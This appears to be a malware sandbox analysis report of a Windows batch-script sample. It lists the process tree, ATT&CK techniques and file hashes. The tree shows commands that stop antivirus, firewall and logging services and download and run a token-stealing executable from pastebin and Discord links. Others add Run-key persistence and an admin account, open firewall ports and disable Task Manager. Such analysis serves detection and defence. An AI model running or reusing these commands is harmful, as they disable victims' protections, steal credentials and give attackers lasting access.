C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wuauserv"
3⤵
PID:2924

C:\Windows\system32\net.exe
net stop "security center"
2⤵
- Suspicious use of WriteProcessMemory
PID:1368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "security center"
3⤵
PID:3348

C:\Windows\system32\net.exe
net stop sharedaccess
2⤵
PID:3988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sharedaccess
3⤵
PID:3780

C:\Windows\system32\netsh.exe
netsh firewall set opmode mode-disable
2⤵
PID:4396

C:\Windows\system32\net.exe
net stop "Security Center" /y
2⤵
PID:1580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Security Center" /y
3⤵
PID:1892

C:\Windows\system32\net.exe
net stop "Automatic Updates" /y
2⤵
PID:2220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Automatic Updates" /y
3⤵
PID:4272

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:4516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:3712

C:\Windows\system32\net.exe
net stop "SAVScan" /y
2⤵
PID:3996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVScan" /y
3⤵
PID:3368

C:\Windows\system32\net.exe
net stop "norton AntiVirus Firewall Monitor Service" /y
2⤵
PID:1248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y
3⤵
PID:3224

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto-Protect Service" /y
2⤵
PID:2124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y
3⤵
PID:4448

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:952

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:1880

C:\Windows\system32\net.exe
net stop "McAfee Spamkiller Server" /y
2⤵
PID:636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y
3⤵
PID:3624

C:\Windows\system32\net.exe
net stop "McAfee Personal Firewall Service" /y
2⤵
PID:3104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y
3⤵
PID:1588

C:\Windows\system32\net.exe
net stop "McAfee SecurityCenter Update Manager" /y
2⤵
PID:2776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee SecurityCenter Update Manager" /y
3⤵
PID:3416

C:\Windows\system32\net.exe
net stop "Symantec SPBBCSvc" /y
2⤵
PID:4752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y
3⤵
PID:4384

C:\Windows\system32\net.exe
net stop "Ahnlab Task Scheduler" /y
2⤵
PID:4376

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y
3⤵
PID:2680

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:4044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:2972

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:3436

C:\Windows\system32\net.exe
net stop vrmonsvc /y
2⤵
PID:1780

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vrmonsvc /y
3⤵
PID:4628

C:\Windows\system32\net.exe
net stop MonSvcNT /y
2⤵
PID:1928

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MonSvcNT /y
3⤵
PID:1472

C:\Windows\system32\net.exe
net stop SAVScan /y
2⤵
PID:800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVScan /y
3⤵
PID:1484

C:\Windows\system32\net.exe
net stop NProtectService /y
2⤵
PID:3760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NProtectService /y
3⤵
PID:1604

C:\Windows\system32\net.exe
net stop ccSetMGR /y
2⤵
PID:3144

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMGR /y
3⤵
PID:4852

C:\Windows\system32\net.exe
net stop ccEvtMGR /y
2⤵
PID:612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMGR /y
3⤵
PID:1444

C:\Windows\system32\net.exe
net stop srservice /y
2⤵
PID:1100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop srservice /y
3⤵
PID:4644

C:\Windows\system32\net.exe
net stop "Symantec Network Drivers Service" /y
2⤵
PID:1188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Network Drivers Service" /y
3⤵
PID:1796

C:\Windows\system32\net.exe
net stop "norton Unerase Protection" /y
2⤵
PID:2816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton Unerase Protection" /y
3⤵
PID:4716

C:\Windows\system32\net.exe
net stop MskService /y
2⤵
PID:2172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MskService /y
3⤵
PID:3844

C:\Windows\system32\net.exe
net stop MpfService /y
2⤵
PID:2880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MpfService /y
3⤵
PID:4276

C:\Windows\system32\net.exe
net stop mcupdmgr.exe /y
2⤵
PID:1740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mcupdmgr.exe /y
3⤵
PID:1944

C:\Windows\system32\net.exe
net stop "McAfeeAntiSpyware" /y
2⤵
PID:3120

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y
3⤵
PID:3716

C:\Windows\system32\net.exe
net stop helpsvc /y
2⤵
PID:3712

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop helpsvc /y
3⤵
PID:3460

C:\Windows\system32\net.exe
net stop ERSvc /y
2⤵
PID:4820

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ERSvc /y
3⤵
PID:4068

C:\Windows\system32\net.exe
net stop "*norton*" /y
2⤵
PID:5072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*norton*" /y
3⤵
PID:992

C:\Windows\system32\net.exe
net stop "*Symantec*" /y
2⤵
PID:1248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*Symantec*" /y
3⤵
PID:4932

C:\Windows\system32\net.exe
net stop "*McAfee*" /y
2⤵
PID:4456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "*McAfee*" /y
3⤵
PID:3544

C:\Windows\system32\net.exe
net stop ccPwdSvc /y
2⤵
PID:1516

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccPwdSvc /y
3⤵
PID:2020

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
PID:2224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:4996

C:\Windows\system32\net.exe
net stop navapsvc /y
2⤵
PID:228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop navapsvc /y
3⤵
PID:2080

C:\Windows\system32\net.exe
net stop "Serv-U" /y
2⤵
PID:4956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Serv-U" /y
3⤵
PID:4640

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:4784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:3728

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:4356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:4808

C:\Windows\system32\net.exe
net stop "Symantec AntiVirus Client" /y
2⤵
PID:1848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec AntiVirus Client" /y
3⤵
PID:4044

C:\Windows\system32\net.exe
net stop "norton AntiVirus Server" /y
2⤵
PID:4160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Server" /y
3⤵
PID:3176

C:\Windows\system32\net.exe
net stop "NAV Alert" /y
2⤵
PID:4336

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NAV Alert" /y
3⤵
PID:2120

C:\Windows\system32\net.exe
net stop "Nav Auto-Protect" /y
2⤵
PID:1032

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Nav Auto-Protect" /y
3⤵
PID:2188

C:\Windows\system32\net.exe
net stop "McShield" /y
2⤵
PID:3684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McShield" /y
3⤵
PID:2424

C:\Windows\system32\net.exe
net stop "DefWatch" /y
2⤵
PID:3988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "DefWatch" /y
3⤵
PID:2140

C:\Windows\system32\net.exe
net stop eventlog /y
2⤵
PID:900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop eventlog /y
3⤵
PID:612

C:\Windows\system32\net.exe
net stop InoRPC /y
2⤵
PID:4628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRPC /y
3⤵
PID:2128

C:\Windows\system32\net.exe
net stop InoRT /y
2⤵
PID:4052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoRT /y
3⤵
PID:1440

C:\Windows\system32\net.exe
net stop InoTask /y
2⤵
PID:2424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop InoTask /y
3⤵
PID:2232

C:\Windows\system32\net.exe
net stop "norton AntiVirus Auto Protect Service" /y
2⤵
PID:4776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y
3⤵
PID:2104

C:\Windows\system32\net.exe
net stop "norton AntiVirus Client" /y
2⤵
PID:4768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
3⤵
PID:1844

C:\Windows\system32\net.exe
net stop "norton AntiVirus Corporate Edition" /y
2⤵
PID:3836

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Corporate Edition" /y
3⤵
PID:2160

C:\Windows\system32\net.exe
net stop "ViRobot Professional Monitoring" /y
2⤵
PID:2204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
3⤵
PID:1892

C:\Windows\system32\net.exe
net stop "PC-cillin Personal Firewall" /y
2⤵
PID:2752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
3⤵
PID:3564

C:\Windows\system32\net.exe
net stop "Trend Micro Proxy Service" /y
2⤵
PID:4676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
3⤵
PID:1860

C:\Windows\system32\net.exe
net stop "Trend NT Realtime Service" /y
2⤵
PID:3412

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
3⤵
PID:4204

C:\Windows\system32\net.exe
net stop "McAfee.com McShield" /y
2⤵
PID:3720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com McShield" /y
3⤵
PID:4720

C:\Windows\system32\net.exe
net stop "McAfee.com VirusScan Online Realtime Engine" /y
2⤵
PID:5060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
3⤵
PID:4324

C:\Windows\system32\net.exe
net stop "SyGateService" /y
2⤵
PID:4268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SyGateService" /y
3⤵
PID:1248

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:1296

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:3124

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus" /y
2⤵
PID:1880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
3⤵
PID:3912

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus Network" /y
2⤵
PID:4220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
3⤵
PID:3676

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Job Server" /y
2⤵
PID:3508

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
3⤵
PID:4340

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Realtime Server" /y
2⤵
PID:4348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
3⤵
PID:4376

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:1492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:2120

C:\Windows\system32\net.exe
net stop "eTrust Antivirus RPC Server" /y
2⤵
PID:3384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
3⤵
PID:4628

C:\Windows\system32\net.exe
net stop netsvcs
2⤵
PID:3560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop netsvcs
3⤵
PID:1128

C:\Windows\system32\net.exe
net stop spoolnt
2⤵
PID:3684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop spoolnt
3⤵
PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
PID:1100

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4632

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1892

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1428

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4268

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4352

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:4384

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2680

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2960

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:720

C:\Windows\system32\rundll32.exe
RUNDLL32 USER32.DLL SwapMouseButton
2⤵
PID:996

C:\Windows\system32\tskill.exe
tskill iexplore
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1796

C:\Windows\system32\tskill.exe
tskill msnmsgr
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624

C:\Windows\system32\tskill.exe
tskill excel
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564

C:\Windows\system32\tskill.exe
tskill iTunes
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1620

C:\Windows\system32\tskill.exe
tskill calc
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1784

C:\Windows\system32\tskill.exe
tskill msaccess
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2616

C:\Windows\system32\tskill.exe
tskill safari
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3376

C:\Windows\system32\tskill.exe
tskill mspaint
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2124

C:\Windows\system32\tskill.exe
tskill outlook
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4932

C:\Windows\system32\tskill.exe
tskill WINWORD
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1516

C:\Windows\system32\tskill.exe
tskill msnmsgr
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1880

C:\Windows\system32\tskill.exe
tskill firefox
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3104

C:\Windows\system32\tskill.exe
tskill LimreWire
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2428

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
2⤵
PID:3008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
2⤵
PID:4052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K ycynlog.cmd
2⤵
- NTFS ADS
PID:3012

C:\Windows\system32\attrib.exe
attrib +h +s ycynlog.cmd
3⤵
- Views/modifies file attributes
PID:2760

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4487_toolbar" /t "REG_SZ" /d ycynlog.cmd /f
3⤵
- Adds Run key to start application
PID:4336

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
3⤵
- Adds Run key to start application
- Modifies registry key
PID:2312

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
3⤵
PID:2356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe')"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3556

C:\Users\Admin\GetToken.exe
GetToken.exe
3⤵
- Executes dropped EXE
PID:648

C:\Windows\system32\curl.exe
curl -s -o IP.txt https://ipv4.wtfismyip.com/text
3⤵
PID:4388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
PID:3676

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:4140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
4⤵
PID:996

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:3272

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3592

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4376

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:4000

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4632

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:4288

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4412

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:1348

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4412

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3896

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:2188

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:1204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3436

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:1944

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
4⤵
PID:2148

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4288

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3508

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:3892

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3732

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4228

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3456

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:3188

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:2960

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:1512

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3852

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:3600

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:1740

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:4856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
4⤵
PID:1424

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:3564

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:1248

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3676

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:4256

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:2300

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3104

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4680

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:648

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4488

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:4348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4960

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:4716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
4⤵
PID:3856

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:2648

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:1972

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:5024

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3756

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:2260

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:2488

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4208

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:60

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:4808

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 21159" dir=out action=allow protocol=UDP localport=14091
3⤵
PID:3592

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 24276" dir=in action=allow protocol=UDP localport=24946
3⤵
PID:1904

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"
2⤵
PID:5024

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"
2⤵
PID:1840

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3024

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
1⤵
PID:2960

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
1⤵
PID:2148

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4636

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d136d3411d4aa688242c53cafb993aa6

SHA1
1a81cc78e3ca445d5a5193e49ddce26d5e25179f

SHA256
00ae5433c0107cc164516c7849b4cff7b6faeb52e5afa65c01dbd8c7a5efe397

SHA512
282ea53f8093c00e8c64d253782068211f8c4187391d5078755f55dedb8825c0042173d82f489d7b6c06e88184b70e83c1e92dadb80f57bd96c95855ac6b3da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
